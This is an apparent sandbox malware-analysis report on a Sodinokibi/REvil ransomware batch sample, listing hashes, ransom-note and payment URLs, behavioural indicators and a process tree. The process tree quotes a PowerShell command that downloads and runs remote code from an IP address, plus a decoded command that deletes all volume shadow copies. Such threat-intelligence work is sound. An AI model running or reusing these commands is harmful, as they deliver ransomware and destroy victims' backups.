Analysis
  max time kernel: 140s
  max time network: 147s
  platform: windows7_x64
  resource: win7v200430
  submitted: 17-05-2020 20:10

Static task: static1
Behavioral task: behavioral1
  Sample: df334765cb86900aeb9265c48916c137.bat
  Resource: win7v200430
Behavioral task: behavioral2
  Sample: df334765cb86900aeb9265c48916c137.bat
  Resource: win10v200430

General
  Target: df334765cb86900aeb9265c48916c137.bat
  Size: 216B
  MD5: a5ab635f123ce58648141c6dfd2b8c99
  SHA1: da19de350a515c434870a6493a1d7484cb5f64df
  SHA256: ec1d6ba7554a54f9a7f29c8d80402ca165daad5f17549536d444fd0308adf769
  SHA512: e69b7a51700f56cb940b3fba88e836a799cbbd61be6a57199ed18161a2096a688effd8c2a20409022791ee2c28ec1037c908eb338763bf43f53d5809eeeff691

Malware Config
  Extracted: http://185.103.242.78/pastes/df334765cb86900aeb9265c48916c137
  Extracted: C:\8at2a4-read-me.txt
    sodinokibi
    http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B9C760F0E8C9E902
    http://decryptor.cc/B9C760F0E8C9E902
Signatures

- Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  Process: powershell.exe
  Set value (str): \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\sfb2296.bmp" (powershell.exe)
- Drops file in System32 directory (1 IoC)
  Process: powershell.exe
  File opened for modification: C:\Windows\System32\CatRoot2\dberr.txt (powershell.exe)
- Modifies system certificate store
  Process: powershell.exe
  Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 (powershell.exe)
  Set value (data): \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = [certificate blob omitted] (powershell.exe)
  Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 (powershell.exe)
  Set value (data): \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = [certificate blob omitted; the DER data carries the subject "Digital Signature Trust Co. / DST Root CA X3", a public root. Entries under AuthRoot\Certificates of this kind are normally written by Windows' automatic root update when a process first makes a TLS connection, so they should be read alongside the network activity rather than as a certificate the sample itself installed] (powershell.exe)
- Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.

- Enumerates connected drives (3 TTPs)
- Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes: powershell.exe, powershell.exe, vssvc.exe
  Token: SeDebugPrivilege          PID 1480  powershell.exe
  Token: SeDebugPrivilege          PID 1480  powershell.exe
  Token: SeDebugPrivilege          PID 1688  powershell.exe
  Token: SeBackupPrivilege         PID 1592  vssvc.exe
  Token: SeRestorePrivilege        PID 1592  vssvc.exe
  Token: SeAuditPrivilege          PID 1592  vssvc.exe
  Token: SeTakeOwnershipPrivilege  PID 1480  powershell.exe
- Modifies service (2 TTPs, 4 IoCs)
  Process: vssvc.exe
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer (vssvc.exe)
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer (vssvc.exe)
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer (vssvc.exe)
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer (vssvc.exe)
- Suspicious behavior: EnumeratesProcesses (77 IoCs)
  Processes: powershell.exe, powershell.exe
  PID 1480 powershell.exe (repeated hits; accounts for most of the listed entries)
  PID 1688 powershell.exe (repeated hits)
- Blacklisted process makes network request (70 IoCs)
  Process: powershell.exe (PID 1480)
  Flows: 2, 6, 7, 10, 12, 14, 15, 17, 18, 20, 21, 23, 25, 26, 28, 29, 31, 32, 34, 36, 39, 41, 42, 44, 46, 48, 49, 51, 52, 54, 56, 58, 60, 62, 63, 65, 67, 68, 70, 72, 74, 75, 77, 78, 80, 82, 84, 86, 87, 89, 90, 92, 94, 96, 97, 99, 100, 102, 104, 106, 107, 109, 111, 112 (all from PID 1480 powershell.exe)
- Drops file in Program Files directory (26 IoCs)
  Process: powershell.exe
  File opened for modification: \??\c:\program files\ConvertFromAdd.vsx (powershell.exe)
  File opened for modification: \??\c:\program files\DismountDebug.xltx (powershell.exe)
  File opened for modification: \??\c:\program files\SearchBlock.vb (powershell.exe)
  File opened for modification: \??\c:\program files\SwitchUpdate.midi (powershell.exe)
  File opened for modification: \??\c:\program files\UnlockInstall.ods (powershell.exe)
  File opened for modification: \??\c:\program files\UnregisterComplete.xht (powershell.exe)
  File opened for modification: \??\c:\program files\WatchResize.vstx (powershell.exe)
  File created: \??\c:\program files (x86)\8at2a4-read-me.txt (powershell.exe)
  File opened for modification: \??\c:\program files\EnterRevoke.avi (powershell.exe)
  File opened for modification: \??\c:\program files\ExportSkip.dotm (powershell.exe)
  File opened for modification: \??\c:\program files\InitializeRestart.dib (powershell.exe)
  File opened for modification: \??\c:\program files\LimitCopy.xlsb (powershell.exe)
  File created: \??\c:\program files\microsoft sql server compact edition\8at2a4-read-me.txt (powershell.exe)
  File opened for modification: \??\c:\program files\GetMove.ttf (powershell.exe)
  File opened for modification: \??\c:\program files\InitializeCompare.mpeg2 (powershell.exe)
  File opened for modification: \??\c:\program files\InitializeShow.au (powershell.exe)
  File opened for modification: \??\c:\program files\ResumeSync.mp4v (powershell.exe)
  File opened for modification: \??\c:\program files\TraceSet.m4a (powershell.exe)
  File created: \??\c:\program files\microsoft sql server compact edition\v3.5\8at2a4-read-me.txt (powershell.exe)
  File created: \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\8at2a4-read-me.txt (powershell.exe)
  File created: \??\c:\program files\8at2a4-read-me.txt (powershell.exe)
  File opened for modification: \??\c:\program files\BackupCompare.eprtx (powershell.exe)
  File opened for modification: \??\c:\program files\MoveRedo.asp (powershell.exe)
  File opened for modification: \??\c:\program files\NewImport.inf (powershell.exe)
  File opened for modification: \??\c:\program files\OptimizeEdit.svg (powershell.exe)
  File opened for modification: \??\c:\program files\ResumeEdit.vsx (powershell.exe)
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  Process: PID 1480 powershell.exe
- Suspicious use of WriteProcessMemory (5 IoCs)
  Processes: cmd.exe, powershell.exe
  PID 1312 cmd.exe wrote to memory of PID 1480 powershell.exe
  PID 1480 powershell.exe wrote to memory of PID 1688 powershell.exe
  PID 1480 powershell.exe wrote to memory of PID 1688 powershell.exe
  PID 1480 powershell.exe wrote to memory of PID 1688 powershell.exe
  PID 1480 powershell.exe wrote to memory of PID 1688 powershell.exe
Processes

- C:\Windows\system32\cmd.exe (PID 1312)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\df334765cb86900aeb9265c48916c137.bat"
  - Suspicious use of WriteProcessMemory

  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1480, child of 1312)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/df334765cb86900aeb9265c48916c137');Invoke-ADDYUVRSM;Start-Sleep -s 10000"
    - Sets desktop wallpaper using registry
    - Drops file in System32 directory
    - Modifies system certificate store
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - Drops file in Program Files directory
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of WriteProcessMemory

    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1688, child of 1480)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (The -e argument is UTF-16LE base64 and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}. This shadow-copy deletion is what triggers the vssvc.exe activity and the SeBackupPrivilege/SeRestorePrivilege token use recorded above.)
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses

- C:\Windows\system32\vssvc.exe (PID 1592)
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
  - Modifies service